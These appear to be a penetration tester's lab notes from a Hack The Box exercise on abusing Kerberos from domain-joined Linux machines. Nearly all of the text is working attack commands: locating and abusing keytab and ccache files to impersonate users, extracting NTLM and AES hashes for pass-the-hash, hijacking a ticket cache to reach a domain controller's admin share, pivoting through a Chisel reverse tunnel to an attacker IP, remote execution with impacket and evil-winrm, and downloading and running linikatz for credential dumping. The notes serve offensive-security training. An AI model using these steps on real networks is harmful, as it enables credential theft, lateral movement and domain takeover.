Using Linux

Checking if Linux is Domain Joined

$ realm list

$ ps -ef | grep -i "winbind\|sssd"

Finding Kerberos Tickets

Finding Keytab Files

Keytab are allow scripts to authenticate automatically using kerberos without password intercation or storing pass in plaintext file

To use keytab file, we need to have rw permissions on the file

Default Location: /etc/krb5.keytab

$ find / -name *keytab* -ls 2>/dev/null

Identifying Keytab Files in cronjobs

$ crontab -l

# m h  dom mon dow   command
*5/ * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh

$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash

kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls'  -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt

Finding ccache files

Linux stores kerberos tickets in ccache files

Searching Environment Variables

$ env | grep -i krb5

Searching /tmp

$ ls -la /tmp

Exploitation

Abusing keytab files

Listing keytab file information

$ klist -k -t 

Impersonating a user

$ kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

Connecting to SMB Share as carlos

$ smbclient //dc01/carlos -k -c ls

Keytab Extract

KeyTabExtract

$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab 

NTLM -> pass the hash

AES -> Forge tickets using Rubeus

Abusing Keytab ccache

Looking for ccache files

# ls -la /tmp

Identifying group membership

# id julio@inlanefreight.htb

Importing ccache file to our current session

# klist
# cp /tmp/krb5cc_647401106_I8I133 .
# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
# klist
# smbclient //dc01/C$ -k -c ls -no-pass

Using Linux Attack Tools with Kerberos

If we do not have direct connection from our attacker machine to the KDC/Domain Controller, we need to proxy using Chisel/Proxychains

Host File Modified

rednorth@htb[/htb]$ cat /etc/hosts

# Host addresses

172.16.1.10 inlanefreight.htb   inlanefreight   dc01.inlanefreight.htb  dc01
172.16.1.5  ms01.inlanefreight.htb  ms01

Proxy Chains Configuration File

$ cat /etc/proxychains.conf

<SNIP>

[ProxyList]
socks5 127.0.0.1 1080

Download Chisel to our attack host

$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
$ gzip -d chisel_1.7.7_linux_amd64.gz
$ mv chisel_* chisel && chmod +x ./chisel
$ sudo ./chisel server --reverse 

Execute Chisel from our victim host

C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks # IP is attacker IP

Download ccache

$ # download the ccache from Linux01 and export it
$ export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133

Using impacket with proxychains

$ proxychains impacket-wmiexec dc01 -k

Using Evil-Winrm

$ sudo apt-get install krb5-user -y # installing krb auth package

If krb5-user is already installed, change the config

$ cat /etc/krb5.conf

[libdefaults]
        default_realm = INLANEFREIGHT.HTB

<SNIP>

[realms]
    INLANEFREIGHT.HTB = {
        kdc = dc01.inlanefreight.htb
    }

<SNIP>

$ proxychains evil-winrm -i dc01 -r inlanefreight.htb

Miscellaneous

If we want to use a ccache file in Windows or a kirbi file in a Linux machine, we can use impacket-ticketConverter to convert them

$ impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi

Linikatz

$ wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
$ /opt/linikatz.sh